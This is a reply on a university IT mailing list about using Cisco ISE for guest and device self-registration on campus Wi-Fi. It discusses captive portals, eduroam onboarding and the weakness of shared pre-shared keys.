We've never used certs, but have had username/password-based 802.1x for internal use and an unencrypted network for guests. I'm unsure if you're looking for guests or less-capable devices from internal constituents, so I'll try to address both.
We're now (as of this summer) using ISE for our guest/non-802.1x-capable-devices wifi. Registering devices is just the ISE device registration portal (screenshots at https://goo.gl/iPdbGv). No complaints on that functionality so far. Registration is intended for devices which don't support 802.1x (whether at all or just not practically), but there's nothing technically stopping someone from registering their phone or whatever if they don't need internal non-public access and prefer that route to just using CAT. The same network is used for guests with a captive portal. It seems to work as expected, although the self-reg is oriented around creating an account and then logging in devices, so to streamline that we had to think outside the box and add a couple lines of css (it wasn't something the vendor would configure). The guest process in screenshots: https://goo.gl/5FHFP6 We also allow people to sign in which grants access for the same ~1 day as guests, which prompts to eduroam or registration for longer term ( https://goo.gl/mEbx5x). The login option is primarily to facilitate onboarding to eduroam (provide them access to the CAT website, as our config effectively requires it), thus not auto-registering the device for continued access. Unless you go with a system allowing per-user PSK (AFAIK not Cisco currently), I feel attempting that for general use is just giving false security (in a negative way). Once that key is known by any malicious party (including just a compromised system), there's nothing significant stopping them from looking at traffic for other users. If that key is on devices from guests and/or a non-very-tightly-controlled segment of the community... On Mon, Aug 1, 2016 at 9:05 AM, T. Shayne Ghere <[email protected]> wrote: > Good morning, > > > > Currently we have a home grown wireless registration system in place that > is becoming obsolete. We are getting ready to refresh our Cisco AP’s, and > I’m writing to see if anyone has any positive/negative issues in using > Cisco ISE for individual “self” registration on your wireless network. > > > > We also use WPA2/AES Certificate based security, but that is problematic > because of compatibility issues and devices that have no way of accepting > certs. In talking with some Cisco Wireless Engineers, they recommend > WPA2/AES-PSK but we don’t have the manpower to set that up on every > device. We also do not NAT any devices. > > > > If you have any suggestions, or comments on using ISE and moving away from > Certs, I would greatly appreciate them. > > > > Thanks > > Shayne > > > > ---------------------------------- > > T. Shayne Ghere > > Bradley University > > Wireless/Lan Network Engineer > > 1501 W. Bradley Ave, Jobst 224A > > [email protected] > > *FBI CA Graduate2011 Alumni* > > *FBI InfraGard Member* > > ---------------------------------- > > *UPCOMING OUT OF OFFICE* > > None > ********** Participation and subscription information for this EDUCAUSE > Constituent Group discussion list can be found at > http://www.educause.edu/groups/. > > -- Jeremy Mooney ITS - Bethel University ********** Participation and subscription information for this EDUCAUSE Constituent Group discussion list can be found at http://www.educause.edu/groups/.
